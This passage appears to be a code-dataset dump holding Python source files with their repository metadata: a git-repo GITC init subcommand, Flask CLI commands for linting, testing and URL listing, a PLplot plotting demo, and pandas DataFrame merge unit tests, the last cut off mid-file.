repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
lipro-yocto/git-repo | subcmds/gitc_init.py | 1 | 3060 | # Copyright (C) 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import gitc_utils
from command import GitcAvailableCommand
from manifest_xml import GitcManifest
from subcmds import init
import wrapper
class GitcInit(init.Init, GitcAvailableCommand):
common = True
helpSummary = "Initialize a GITC Client."
helpUsage = """
%prog [options] [client name]
"""
helpDescription = """
The '%prog' command is ran to initialize a new GITC client for use
with the GITC file system.
This command will setup the client directory, initialize repo, just
like repo init does, and then downloads the manifest collection
and installs it in the .repo/directory of the GITC client.
Once this is done, a GITC manifest is generated by pulling the HEAD
SHA for each project and generates the properly formatted XML file
and installs it as .manifest in the GITC client directory.
The -c argument is required to specify the GITC client name.
The optional -f argument can be used to specify the manifest file to
use for this GITC client.
"""
def _Options(self, p):
super(GitcInit, self)._Options(p, gitc_init=True)
g = p.add_option_group('GITC options')
g.add_option('-f', '--manifest-file',
dest='manifest_file',
help='Optional manifest file to use for this GITC client.')
g.add_option('-c', '--gitc-client',
dest='gitc_client',
help='The name of the gitc_client instance to create or modify.')
def Execute(self, opt, args):
gitc_client = gitc_utils.parse_clientdir(os.getcwd())
if not gitc_client or (opt.gitc_client and gitc_client != opt.gitc_client):
print('fatal: Please update your repo command. See go/gitc for instructions.',
file=sys.stderr)
sys.exit(1)
self.client_dir = os.path.join(gitc_utils.get_gitc_manifest_dir(),
gitc_client)
super(GitcInit, self).Execute(opt, args)
manifest_file = self.manifest.manifestFile
if opt.manifest_file:
if not os.path.exists(opt.manifest_file):
print('fatal: Specified manifest file %s does not exist.' %
opt.manifest_file)
sys.exit(1)
manifest_file = opt.manifest_file
manifest = GitcManifest(self.repodir, gitc_client)
manifest.Override(manifest_file)
gitc_utils.generate_gitc_manifest(None, manifest)
print('Please run `cd %s` to view your GITC client.' %
os.path.join(wrapper.Wrapper().GITC_FS_ROOT_DIR, gitc_client))
| apache-2.0 | 8,735,617,120,058,002,000 | 36.777778 | 84 | 0.699673 | false |
mohamed-aziz/realworld-flask | conduit/commands.py | 1 | 4204 | # -*- coding: utf-8 -*-
"""Click commands."""
import os
from glob import glob
from subprocess import call
import click
from flask import current_app
from flask.cli import with_appcontext
from werkzeug.exceptions import MethodNotAllowed, NotFound
HERE = os.path.abspath(os.path.dirname(__file__))
PROJECT_ROOT = os.path.join(HERE, os.pardir)
TEST_PATH = os.path.join(PROJECT_ROOT, 'tests')
@click.command()
def test():
"""Run the tests."""
import pytest
rv = pytest.main([TEST_PATH, '--verbose'])
exit(rv)
@click.command()
@click.option('-f', '--fix-imports', default=False, is_flag=True,
help='Fix imports using isort, before linting')
def lint(fix_imports):
"""Lint and check code style with flake8 and isort."""
skip = ['requirements']
root_files = glob('*.py')
root_directories = [
name for name in next(os.walk('.'))[1] if not name.startswith('.')]
files_and_directories = [
arg for arg in root_files + root_directories if arg not in skip]
def execute_tool(description, *args):
"""Execute a checking tool with its arguments."""
command_line = list(args) + files_and_directories
click.echo('{}: {}'.format(description, ' '.join(command_line)))
rv = call(command_line)
if rv != 0:
exit(rv)
if fix_imports:
execute_tool('Fixing import order', 'isort', '-rc')
execute_tool('Checking code style', 'flake8')
@click.command()
def clean():
"""Remove *.pyc and *.pyo files recursively starting at current directory.
Borrowed from Flask-Script, converted to use Click.
"""
for dirpath, _, filenames in os.walk('.'):
for filename in filenames:
if filename.endswith('.pyc') or filename.endswith('.pyo'):
full_pathname = os.path.join(dirpath, filename)
click.echo('Removing {}'.format(full_pathname))
os.remove(full_pathname)
@click.command()
@click.option('--url', default=None,
help='Url to test (ex. /static/image.png)')
@click.option('--order', default='rule',
help='Property on Rule to order by (default: rule)')
@with_appcontext
def urls(url, order):
"""Display all of the url matching routes for the project.
Borrowed from Flask-Script, converted to use Click.
"""
rows = []
column_length = 0
column_headers = ('Rule', 'Endpoint', 'Arguments')
if url:
try:
rule, arguments = (
current_app.url_map.bind('localhost')
.match(url, return_rule=True))
rows.append((rule.rule, rule.endpoint, arguments))
column_length = 3
except (NotFound, MethodNotAllowed) as e:
rows.append(('<{}>'.format(e), None, None))
column_length = 1
else:
rules = sorted(
current_app.url_map.iter_rules(),
key=lambda rule: getattr(rule, order))
for rule in rules:
rows.append((rule.rule, rule.endpoint, None))
column_length = 2
str_template = ''
table_width = 0
if column_length >= 1:
max_rule_length = max(len(r[0]) for r in rows)
max_rule_length = max_rule_length if max_rule_length > 4 else 4
str_template += '{:' + str(max_rule_length) + '}'
table_width += max_rule_length
if column_length >= 2:
max_endpoint_length = max(len(str(r[1])) for r in rows)
# max_endpoint_length = max(rows, key=len)
max_endpoint_length = (
max_endpoint_length if max_endpoint_length > 8 else 8)
str_template += ' {:' + str(max_endpoint_length) + '}'
table_width += 2 + max_endpoint_length
if column_length >= 3:
max_arguments_length = max(len(str(r[2])) for r in rows)
max_arguments_length = (
max_arguments_length if max_arguments_length > 9 else 9)
str_template += ' {:' + str(max_arguments_length) + '}'
table_width += 2 + max_arguments_length
click.echo(str_template.format(*column_headers[:column_length]))
click.echo('-' * table_width)
for row in rows:
click.echo(str_template.format(*row[:column_length]))
| mit | -989,138,570,625,253,100 | 32.632 | 78 | 0.599191 | false |
FreeScienceCommunity/PLPlot | examples/python/xw10.py | 1 | 1310 | # Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 Alan W. Irwin
# Window positioning demo.
#
# This file is part of PLplot.
#
# PLplot is free software; you can redistribute it and/or modify
# it under the terms of the GNU Library General Public License as published
# by the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# PLplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with PLplot; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
from plplot_py_demos import *
# main
#
# Demonstrates absolute positioning of graphs on a page.
def main():
pladv(0)
plvpor(0.0, 1.0, 0.0, 1.0)
plwind(0.0, 1.0, 0.0, 1.0)
plbox("bc", 0.0, 0, "bc", 0.0, 0)
plsvpa(50.0, 150.0, 50.0, 100.0)
plwind(0.0, 1.0, 0.0, 1.0)
plbox("bc", 0.0, 0, "bc", 0.0, 0)
plptex(0.5, 0.5, 1.0, 0.0, 0.5, "BOX at (50,150,50,100)")
# Restore defaults
#plcol0(1)
main()
| lgpl-2.1 | -6,735,022,043,337,639,000 | 29.465116 | 79 | 0.670992 | false |
rs2/pandas | pandas/tests/reshape/merge/test_merge.py | 1 | 78056 | from collections import OrderedDict
from datetime import date, datetime, timedelta
import random
import re
import numpy as np
import pytest
from pandas.core.dtypes.common import is_categorical_dtype, is_object_dtype
from pandas.core.dtypes.dtypes import CategoricalDtype
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Float64Index,
Int64Index,
IntervalIndex,
MultiIndex,
PeriodIndex,
RangeIndex,
Series,
TimedeltaIndex,
UInt64Index,
)
import pandas._testing as tm
from pandas.api.types import CategoricalDtype as CDT
from pandas.core.reshape.concat import concat
from pandas.core.reshape.merge import MergeError, merge
N = 50
NGROUPS = 8
def get_test_data(ngroups=NGROUPS, n=N):
unique_groups = list(range(ngroups))
arr = np.asarray(np.tile(unique_groups, n // ngroups))
if len(arr) < n:
arr = np.asarray(list(arr) + unique_groups[: n - len(arr)])
random.shuffle(arr)
return arr
def get_series():
return [
pd.Series([1], dtype="int64"),
pd.Series([1], dtype="Int64"),
pd.Series([1.23]),
pd.Series(["foo"]),
pd.Series([True]),
pd.Series([pd.Timestamp("2018-01-01")]),
pd.Series([pd.Timestamp("2018-01-01", tz="US/Eastern")]),
]
def get_series_na():
return [
pd.Series([np.nan], dtype="Int64"),
pd.Series([np.nan], dtype="float"),
pd.Series([np.nan], dtype="object"),
pd.Series([pd.NaT]),
]
@pytest.fixture(params=get_series(), ids=lambda x: x.dtype.name)
def series_of_dtype(request):
"""
A parametrized fixture returning a variety of Series of different
dtypes
"""
return request.param
@pytest.fixture(params=get_series(), ids=lambda x: x.dtype.name)
def series_of_dtype2(request):
"""
A duplicate of the series_of_dtype fixture, so that it can be used
twice by a single function
"""
return request.param
@pytest.fixture(params=get_series_na(), ids=lambda x: x.dtype.name)
def series_of_dtype_all_na(request):
"""
A parametrized fixture returning a variety of Series with all NA
values
"""
return request.param
class TestMerge:
def setup_method(self, method):
# aggregate multiple columns
self.df = DataFrame(
{
"key1": get_test_data(),
"key2": get_test_data(),
"data1": np.random.randn(N),
"data2": np.random.randn(N),
}
)
# exclude a couple keys for fun
self.df = self.df[self.df["key2"] > 1]
self.df2 = DataFrame(
{
"key1": get_test_data(n=N // 5),
"key2": get_test_data(ngroups=NGROUPS // 2, n=N // 5),
"value": np.random.randn(N // 5),
}
)
self.left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
self.right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
def test_merge_inner_join_empty(self):
# GH 15328
df_empty = pd.DataFrame()
df_a = pd.DataFrame({"a": [1, 2]}, index=[0, 1], dtype="int64")
result = pd.merge(df_empty, df_a, left_index=True, right_index=True)
expected = pd.DataFrame({"a": []}, index=[], dtype="int64")
tm.assert_frame_equal(result, expected)
def test_merge_common(self):
joined = merge(self.df, self.df2)
exp = merge(self.df, self.df2, on=["key1", "key2"])
tm.assert_frame_equal(joined, exp)
def test_merge_non_string_columns(self):
# https://github.com/pandas-dev/pandas/issues/17962
# Checks that method runs for non string column names
left = pd.DataFrame(
{0: [1, 0, 1, 0], 1: [0, 1, 0, 0], 2: [0, 0, 2, 0], 3: [1, 0, 0, 3]}
)
right = left.astype(float)
expected = left
result = pd.merge(left, right)
tm.assert_frame_equal(expected, result)
def test_merge_index_as_on_arg(self):
# GH14355
left = self.df.set_index("key1")
right = self.df2.set_index("key1")
result = merge(left, right, on="key1")
expected = merge(self.df, self.df2, on="key1").set_index("key1")
tm.assert_frame_equal(result, expected)
def test_merge_index_singlekey_right_vs_left(self):
left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
merged1 = merge(
left, right, left_on="key", right_index=True, how="left", sort=False
)
merged2 = merge(
right, left, right_on="key", left_index=True, how="right", sort=False
)
tm.assert_frame_equal(merged1, merged2.loc[:, merged1.columns])
merged1 = merge(
left, right, left_on="key", right_index=True, how="left", sort=True
)
merged2 = merge(
right, left, right_on="key", left_index=True, how="right", sort=True
)
tm.assert_frame_equal(merged1, merged2.loc[:, merged1.columns])
def test_merge_index_singlekey_inner(self):
left = DataFrame(
{"key": ["a", "b", "c", "d", "e", "e", "a"], "v1": np.random.randn(7)}
)
right = DataFrame({"v2": np.random.randn(4)}, index=["d", "b", "c", "a"])
# inner join
result = merge(left, right, left_on="key", right_index=True, how="inner")
expected = left.join(right, on="key").loc[result.index]
tm.assert_frame_equal(result, expected)
result = merge(right, left, right_on="key", left_index=True, how="inner")
expected = left.join(right, on="key").loc[result.index]
tm.assert_frame_equal(result, expected.loc[:, result.columns])
def test_merge_misspecified(self):
msg = "Must pass right_on or right_index=True"
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.right, left_index=True)
msg = "Must pass left_on or left_index=True"
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.right, right_index=True)
msg = (
'Can only pass argument "on" OR "left_on" and "right_on", not '
"a combination of both"
)
with pytest.raises(pd.errors.MergeError, match=msg):
merge(self.left, self.left, left_on="key", on="key")
msg = r"len\(right_on\) must equal len\(left_on\)"
with pytest.raises(ValueError, match=msg):
merge(self.df, self.df2, left_on=["key1"], right_on=["key1", "key2"])
def test_index_and_on_parameters_confusion(self):
msg = "right_index parameter must be of type bool, not <class 'list'>"
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=False,
right_index=["key1", "key2"],
)
msg = "left_index parameter must be of type bool, not <class 'list'>"
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=["key1", "key2"],
right_index=False,
)
with pytest.raises(ValueError, match=msg):
merge(
self.df,
self.df2,
how="left",
left_index=["key1", "key2"],
right_index=["key1", "key2"],
)
def test_merge_overlap(self):
merged = merge(self.left, self.left, on="key")
exp_len = (self.left["key"].value_counts() ** 2).sum()
assert len(merged) == exp_len
assert "v1_x" in merged
assert "v1_y" in merged
def test_merge_different_column_key_names(self):
left = DataFrame({"lkey": ["foo", "bar", "baz", "foo"], "value": [1, 2, 3, 4]})
right = DataFrame({"rkey": ["foo", "bar", "qux", "foo"], "value": [5, 6, 7, 8]})
merged = left.merge(
right, left_on="lkey", right_on="rkey", how="outer", sort=True
)
exp = pd.Series(["bar", "baz", "foo", "foo", "foo", "foo", np.nan], name="lkey")
tm.assert_series_equal(merged["lkey"], exp)
exp = pd.Series(["bar", np.nan, "foo", "foo", "foo", "foo", "qux"], name="rkey")
tm.assert_series_equal(merged["rkey"], exp)
exp = pd.Series([2, 3, 1, 1, 4, 4, np.nan], name="value_x")
tm.assert_series_equal(merged["value_x"], exp)
exp = pd.Series([6, np.nan, 5, 8, 5, 8, 7], name="value_y")
tm.assert_series_equal(merged["value_y"], exp)
def test_merge_copy(self):
left = DataFrame({"a": 0, "b": 1}, index=range(10))
right = DataFrame({"c": "foo", "d": "bar"}, index=range(10))
merged = merge(left, right, left_index=True, right_index=True, copy=True)
merged["a"] = 6
assert (left["a"] == 0).all()
merged["d"] = "peekaboo"
assert (right["d"] == "bar").all()
def test_merge_nocopy(self):
left = DataFrame({"a": 0, "b": 1}, index=range(10))
right = DataFrame({"c": "foo", "d": "bar"}, index=range(10))
merged = merge(left, right, left_index=True, right_index=True, copy=False)
merged["a"] = 6
assert (left["a"] == 6).all()
merged["d"] = "peekaboo"
assert (right["d"] == "peekaboo").all()
def test_intelligently_handle_join_key(self):
# #733, be a bit more 1337 about not returning unconsolidated DataFrame
left = DataFrame(
{"key": [1, 1, 2, 2, 3], "value": list(range(5))}, columns=["value", "key"]
)
right = DataFrame({"key": [1, 1, 2, 3, 4, 5], "rvalue": list(range(6))})
joined = merge(left, right, on="key", how="outer")
expected = DataFrame(
{
"key": [1, 1, 1, 1, 2, 2, 3, 4, 5],
"value": np.array([0, 0, 1, 1, 2, 3, 4, np.nan, np.nan]),
"rvalue": [0, 1, 0, 1, 2, 2, 3, 4, 5],
},
columns=["value", "key", "rvalue"],
)
tm.assert_frame_equal(joined, expected)
def test_merge_join_key_dtype_cast(self):
# #8596
df1 = DataFrame({"key": [1], "v1": [10]})
df2 = DataFrame({"key": [2], "v1": [20]})
df = merge(df1, df2, how="outer")
assert df["key"].dtype == "int64"
df1 = DataFrame({"key": [True], "v1": [1]})
df2 = DataFrame({"key": [False], "v1": [0]})
df = merge(df1, df2, how="outer")
# GH13169
# this really should be bool
assert df["key"].dtype == "object"
df1 = DataFrame({"val": [1]})
df2 = DataFrame({"val": [2]})
lkey = np.array([1])
rkey = np.array([2])
df = merge(df1, df2, left_on=lkey, right_on=rkey, how="outer")
assert df["key_0"].dtype == "int64"
def test_handle_join_key_pass_array(self):
left = DataFrame(
{"key": [1, 1, 2, 2, 3], "value": np.arange(5)}, columns=["value", "key"]
)
right = DataFrame({"rvalue": np.arange(6)})
key = np.array([1, 1, 2, 3, 4, 5])
merged = merge(left, right, left_on="key", right_on=key, how="outer")
merged2 = merge(right, left, left_on=key, right_on="key", how="outer")
tm.assert_series_equal(merged["key"], merged2["key"])
assert merged["key"].notna().all()
assert merged2["key"].notna().all()
left = DataFrame({"value": np.arange(5)}, columns=["value"])
right = DataFrame({"rvalue": np.arange(6)})
lkey = np.array([1, 1, 2, 2, 3])
rkey = np.array([1, 1, 2, 3, 4, 5])
merged = merge(left, right, left_on=lkey, right_on=rkey, how="outer")
tm.assert_series_equal(
merged["key_0"], Series([1, 1, 1, 1, 2, 2, 3, 4, 5], name="key_0")
)
left = DataFrame({"value": np.arange(3)})
right = DataFrame({"rvalue": np.arange(6)})
key = np.array([0, 1, 1, 2, 2, 3], dtype=np.int64)
merged = merge(left, right, left_index=True, right_on=key, how="outer")
tm.assert_series_equal(merged["key_0"], Series(key, name="key_0"))
def test_no_overlap_more_informative_error(self):
dt = datetime.now()
df1 = DataFrame({"x": ["a"]}, index=[dt])
df2 = DataFrame({"y": ["b", "c"]}, index=[dt, dt])
msg = (
"No common columns to perform merge on. "
f"Merge options: left_on={None}, right_on={None}, "
f"left_index={False}, right_index={False}"
)
with pytest.raises(MergeError, match=msg):
merge(df1, df2)
def test_merge_non_unique_indexes(self):
dt = datetime(2012, 5, 1)
dt2 = datetime(2012, 5, 2)
dt3 = datetime(2012, 5, 3)
dt4 = datetime(2012, 5, 4)
df1 = DataFrame({"x": ["a"]}, index=[dt])
df2 = DataFrame({"y": ["b", "c"]}, index=[dt, dt])
_check_merge(df1, df2)
# Not monotonic
df1 = DataFrame({"x": ["a", "b", "q"]}, index=[dt2, dt, dt4])
df2 = DataFrame(
{"y": ["c", "d", "e", "f", "g", "h"]}, index=[dt3, dt3, dt2, dt2, dt, dt]
)
_check_merge(df1, df2)
df1 = DataFrame({"x": ["a", "b"]}, index=[dt, dt])
df2 = DataFrame({"y": ["c", "d"]}, index=[dt, dt])
_check_merge(df1, df2)
def test_merge_non_unique_index_many_to_many(self):
dt = datetime(2012, 5, 1)
dt2 = datetime(2012, 5, 2)
dt3 = datetime(2012, 5, 3)
df1 = DataFrame({"x": ["a", "b", "c", "d"]}, index=[dt2, dt2, dt, dt])
df2 = DataFrame(
{"y": ["e", "f", "g", " h", "i"]}, index=[dt2, dt2, dt3, dt, dt]
)
_check_merge(df1, df2)
def test_left_merge_empty_dataframe(self):
left = DataFrame({"key": [1], "value": [2]})
right = DataFrame({"key": []})
result = merge(left, right, on="key", how="left")
tm.assert_frame_equal(result, left)
result = merge(right, left, on="key", how="right")
tm.assert_frame_equal(result, left)
@pytest.mark.parametrize(
"kwarg",
[
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
dict(left_on="a", right_index=True),
dict(left_on="a", right_on="x"),
],
)
def test_merge_left_empty_right_empty(self, join_type, kwarg):
# GH 10824
left = pd.DataFrame(columns=["a", "b", "c"])
right = pd.DataFrame(columns=["x", "y", "z"])
exp_in = pd.DataFrame(
columns=["a", "b", "c", "x", "y", "z"],
index=pd.Index([], dtype=object),
dtype=object,
)
result = pd.merge(left, right, how=join_type, **kwarg)
tm.assert_frame_equal(result, exp_in)
def test_merge_left_empty_right_notempty(self):
# GH 10824
left = pd.DataFrame(columns=["a", "b", "c"])
right = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["x", "y", "z"])
exp_out = pd.DataFrame(
{
"a": np.array([np.nan] * 3, dtype=object),
"b": np.array([np.nan] * 3, dtype=object),
"c": np.array([np.nan] * 3, dtype=object),
"x": [1, 4, 7],
"y": [2, 5, 8],
"z": [3, 6, 9],
},
columns=["a", "b", "c", "x", "y", "z"],
)
exp_in = exp_out[0:0] # make empty DataFrame keeping dtype
# result will have object dtype
exp_in.index = exp_in.index.astype(object)
def check1(exp, kwarg):
result = pd.merge(left, right, how="inner", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="left", **kwarg)
tm.assert_frame_equal(result, exp)
def check2(exp, kwarg):
result = pd.merge(left, right, how="right", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="outer", **kwarg)
tm.assert_frame_equal(result, exp)
for kwarg in [
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
]:
check1(exp_in, kwarg)
check2(exp_out, kwarg)
kwarg = dict(left_on="a", right_index=True)
check1(exp_in, kwarg)
exp_out["a"] = [0, 1, 2]
check2(exp_out, kwarg)
kwarg = dict(left_on="a", right_on="x")
check1(exp_in, kwarg)
exp_out["a"] = np.array([np.nan] * 3, dtype=object)
check2(exp_out, kwarg)
def test_merge_left_notempty_right_empty(self):
# GH 10824
left = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["a", "b", "c"])
right = pd.DataFrame(columns=["x", "y", "z"])
exp_out = pd.DataFrame(
{
"a": [1, 4, 7],
"b": [2, 5, 8],
"c": [3, 6, 9],
"x": np.array([np.nan] * 3, dtype=object),
"y": np.array([np.nan] * 3, dtype=object),
"z": np.array([np.nan] * 3, dtype=object),
},
columns=["a", "b", "c", "x", "y", "z"],
)
exp_in = exp_out[0:0] # make empty DataFrame keeping dtype
# result will have object dtype
exp_in.index = exp_in.index.astype(object)
def check1(exp, kwarg):
result = pd.merge(left, right, how="inner", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="right", **kwarg)
tm.assert_frame_equal(result, exp)
def check2(exp, kwarg):
result = pd.merge(left, right, how="left", **kwarg)
tm.assert_frame_equal(result, exp)
result = pd.merge(left, right, how="outer", **kwarg)
tm.assert_frame_equal(result, exp)
for kwarg in [
dict(left_index=True, right_index=True),
dict(left_index=True, right_on="x"),
dict(left_on="a", right_index=True),
dict(left_on="a", right_on="x"),
]:
check1(exp_in, kwarg)
check2(exp_out, kwarg)
def test_merge_empty_frame(self, series_of_dtype, series_of_dtype2):
# GH 25183
df = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype2},
columns=["key", "value"],
)
df_empty = df[:0]
expected = pd.DataFrame(
{
"value_x": pd.Series(dtype=df.dtypes["value"]),
"key": pd.Series(dtype=df.dtypes["key"]),
"value_y": pd.Series(dtype=df.dtypes["value"]),
},
columns=["value_x", "key", "value_y"],
)
actual = df_empty.merge(df, on="key")
tm.assert_frame_equal(actual, expected)
def test_merge_all_na_column(self, series_of_dtype, series_of_dtype_all_na):
# GH 25183
df_left = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype_all_na},
columns=["key", "value"],
)
df_right = pd.DataFrame(
{"key": series_of_dtype, "value": series_of_dtype_all_na},
columns=["key", "value"],
)
expected = pd.DataFrame(
{
"key": series_of_dtype,
"value_x": series_of_dtype_all_na,
"value_y": series_of_dtype_all_na,
},
columns=["key", "value_x", "value_y"],
)
actual = df_left.merge(df_right, on="key")
tm.assert_frame_equal(actual, expected)
def test_merge_nosort(self):
# GH#2098, TODO: anything to do?
d = {
"var1": np.random.randint(0, 10, size=10),
"var2": np.random.randint(0, 10, size=10),
"var3": [
datetime(2012, 1, 12),
datetime(2011, 2, 4),
datetime(2010, 2, 3),
datetime(2012, 1, 12),
datetime(2011, 2, 4),
datetime(2012, 4, 3),
datetime(2012, 3, 4),
datetime(2008, 5, 1),
datetime(2010, 2, 3),
datetime(2012, 2, 3),
],
}
df = DataFrame.from_dict(d)
var3 = df.var3.unique()
var3.sort()
new = DataFrame.from_dict({"var3": var3, "var8": np.random.random(7)})
result = df.merge(new, on="var3", sort=False)
exp = merge(df, new, on="var3", sort=False)
tm.assert_frame_equal(result, exp)
assert (df.var3.unique() == result.var3.unique()).all()
def test_merge_nan_right(self):
df1 = DataFrame({"i1": [0, 1], "i2": [0, 1]})
df2 = DataFrame({"i1": [0], "i3": [0]})
result = df1.join(df2, on="i1", rsuffix="_")
expected = (
DataFrame(
{
"i1": {0: 0.0, 1: 1},
"i2": {0: 0, 1: 1},
"i1_": {0: 0, 1: np.nan},
"i3": {0: 0.0, 1: np.nan},
None: {0: 0, 1: 0},
}
)
.set_index(None)
.reset_index()[["i1", "i2", "i1_", "i3"]]
)
tm.assert_frame_equal(result, expected, check_dtype=False)
df1 = DataFrame({"i1": [0, 1], "i2": [0.5, 1.5]})
df2 = DataFrame({"i1": [0], "i3": [0.7]})
result = df1.join(df2, rsuffix="_", on="i1")
expected = DataFrame(
{
"i1": {0: 0, 1: 1},
"i1_": {0: 0.0, 1: np.nan},
"i2": {0: 0.5, 1: 1.5},
"i3": {0: 0.69999999999999996, 1: np.nan},
}
)[["i1", "i2", "i1_", "i3"]]
tm.assert_frame_equal(result, expected)
def test_merge_type(self):
class NotADataFrame(DataFrame):
@property
def _constructor(self):
return NotADataFrame
nad = NotADataFrame(self.df)
result = nad.merge(self.df2, on="key1")
assert isinstance(result, NotADataFrame)
def test_join_append_timedeltas(self):
# timedelta64 issues with join/merge
# GH 5695
d = {"d": datetime(2013, 11, 5, 5, 56), "t": timedelta(0, 22500)}
df = DataFrame(columns=list("dt"))
df = df.append(d, ignore_index=True)
result = df.append(d, ignore_index=True)
expected = DataFrame(
{
"d": [datetime(2013, 11, 5, 5, 56), datetime(2013, 11, 5, 5, 56)],
"t": [timedelta(0, 22500), timedelta(0, 22500)],
}
)
tm.assert_frame_equal(result, expected)
td = np.timedelta64(300000000)
lhs = DataFrame(Series([td, td], index=["A", "B"]))
rhs = DataFrame(Series([td], index=["A"]))
result = lhs.join(rhs, rsuffix="r", how="left")
expected = DataFrame(
{
"0": Series([td, td], index=list("AB")),
"0r": Series([td, pd.NaT], index=list("AB")),
}
)
tm.assert_frame_equal(result, expected)
def test_other_datetime_unit(self):
# GH 13389
df1 = pd.DataFrame({"entity_id": [101, 102]})
s = pd.Series([None, None], index=[101, 102], name="days")
for dtype in [
"datetime64[D]",
"datetime64[h]",
"datetime64[m]",
"datetime64[s]",
"datetime64[ms]",
"datetime64[us]",
"datetime64[ns]",
]:
df2 = s.astype(dtype).to_frame("days")
# coerces to datetime64[ns], thus should not be affected
assert df2["days"].dtype == "datetime64[ns]"
result = df1.merge(df2, left_on="entity_id", right_index=True)
exp = pd.DataFrame(
{
"entity_id": [101, 102],
"days": np.array(["nat", "nat"], dtype="datetime64[ns]"),
},
columns=["entity_id", "days"],
)
tm.assert_frame_equal(result, exp)
@pytest.mark.parametrize("unit", ["D", "h", "m", "s", "ms", "us", "ns"])
def test_other_timedelta_unit(self, unit):
# GH 13389
df1 = pd.DataFrame({"entity_id": [101, 102]})
s = pd.Series([None, None], index=[101, 102], name="days")
dtype = f"m8[{unit}]"
df2 = s.astype(dtype).to_frame("days")
assert df2["days"].dtype == "m8[ns]"
result = df1.merge(df2, left_on="entity_id", right_index=True)
exp = pd.DataFrame(
{"entity_id": [101, 102], "days": np.array(["nat", "nat"], dtype=dtype)},
columns=["entity_id", "days"],
)
tm.assert_frame_equal(result, exp)
def test_overlapping_columns_error_message(self):
df = DataFrame({"key": [1, 2, 3], "v1": [4, 5, 6], "v2": [7, 8, 9]})
df2 = DataFrame({"key": [1, 2, 3], "v1": [4, 5, 6], "v2": [7, 8, 9]})
df.columns = ["key", "foo", "foo"]
df2.columns = ["key", "bar", "bar"]
expected = DataFrame(
{
"key": [1, 2, 3],
"v1": [4, 5, 6],
"v2": [7, 8, 9],
"v3": [4, 5, 6],
"v4": [7, 8, 9],
}
)
expected.columns = ["key", "foo", "foo", "bar", "bar"]
tm.assert_frame_equal(merge(df, df2), expected)
# #2649, #10639
df2.columns = ["key1", "foo", "foo"]
msg = r"Data columns not unique: Index\(\['foo', 'foo'\], dtype='object'\)"
with pytest.raises(MergeError, match=msg):
merge(df, df2)
def test_merge_on_datetime64tz(self):
# GH11405
left = pd.DataFrame(
{
"key": pd.date_range("20151010", periods=2, tz="US/Eastern"),
"value": [1, 2],
}
)
right = pd.DataFrame(
{
"key": pd.date_range("20151011", periods=3, tz="US/Eastern"),
"value": [1, 2, 3],
}
)
expected = DataFrame(
{
"key": pd.date_range("20151010", periods=4, tz="US/Eastern"),
"value_x": [1, 2, np.nan, np.nan],
"value_y": [np.nan, 1, 2, 3],
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
left = pd.DataFrame(
{
"key": [1, 2],
"value": pd.date_range("20151010", periods=2, tz="US/Eastern"),
}
)
right = pd.DataFrame(
{
"key": [2, 3],
"value": pd.date_range("20151011", periods=2, tz="US/Eastern"),
}
)
expected = DataFrame(
{
"key": [1, 2, 3],
"value_x": list(pd.date_range("20151010", periods=2, tz="US/Eastern"))
+ [pd.NaT],
"value_y": [pd.NaT]
+ list(pd.date_range("20151011", periods=2, tz="US/Eastern")),
}
)
result = pd.merge(left, right, on="key", how="outer")
tm.assert_frame_equal(result, expected)
assert result["value_x"].dtype == "datetime64[ns, US/Eastern]"
assert result["value_y"].dtype == "datetime64[ns, US/Eastern]"
def test_merge_on_datetime64tz_empty(self):
# https://github.com/pandas-dev/pandas/issues/25014
dtz = pd.DatetimeTZDtype(tz="UTC")
right = pd.DataFrame(
{
"date": [pd.Timestamp("2018", tz=dtz.tz)],
"value": [4.0],
"date2": [pd.Timestamp("2019", tz=dtz.tz)],
},
columns=["date", "value", "date2"],
)
left = right[:0]
result = left.merge(right, on="date")
expected = pd.DataFrame(
{
"value_x": pd.Series(dtype=float),
"date2_x": pd.Series(dtype=dtz),
"date": pd.Series(dtype=dtz),
"value_y": pd.Series(dtype=float),
"date2_y": pd.Series(dtype=dtz),
